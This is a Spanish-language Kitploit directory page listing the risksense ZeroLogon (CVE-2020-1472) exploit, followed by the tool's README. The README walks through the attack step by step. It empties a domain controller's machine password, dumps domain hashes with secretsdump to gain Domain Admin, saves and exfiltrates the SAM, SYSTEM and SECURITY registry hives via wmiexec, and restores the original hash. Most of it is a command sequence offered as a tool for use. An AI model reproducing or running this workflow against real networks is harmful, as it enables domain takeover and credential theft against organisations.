Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
zerologon — Exploit para zerologon cve-2020-1472 | Kitploit
Herramientas/GitHubGitHub/risksense/zerologon
Escalada de PrivilegiosAtaques de ContraseñasAnálisis de VulnerabilidadesExplotaciónPruebas de Penetración
GitHubrisksense/zerologon

zerologon

Exploit para zerologon cve-2020-1472

Ver Repositorio
70414613hace 5 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Script de explotación de ZeroLogon

Código de explotación basado en https://www.secura.com/blog/zero-logon y https://github.com/SecuraBV/CVE-2020-1472. Investigación y escáner originales por Secura, modificaciones por RiskSense Inc.

Para explotar, elimina cualquier instalación previa de Impacket que tengas e instala Impacket desde https://github.com/SecureAuthCorp/impacket/commit/b867b21 o más reciente. Luego, ejecuta:

root@kitploit:~
python3 set_empty_pw DC_NETBIOS_NAME DC_IP_ADDR

Si eso tiene éxito, podrás entonces:

root@kitploit:~
secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC_NETBIOS_NAME$@dc_ip_addr'

lo que debería darte acceso de Administrador de Dominio. Después de tener eso, usa wmiexec.py en el DC objetivo con una credencial del secretsdump y ejecuta

root@kitploit:~
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
get system.save
get sam.save
get security.save
del /f system.save
del /f sam.save
del /f security.save

Luego puedes

root@kitploit:~
secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Y eso debería mostrarte el hash NT original de la cuenta de máquina. Luego puedes reinstalar ese hash original de la cuenta de máquina en el dominio ejecutando

root@kitploit:~
python3 reinstall_original_pw.py DC_NETBIOS_NAME DC_IP_ADDR ORIG_NT_HASH

Reinstalar el hash original es necesario para que el DC continúe operando normalmente.

Descargar herramienta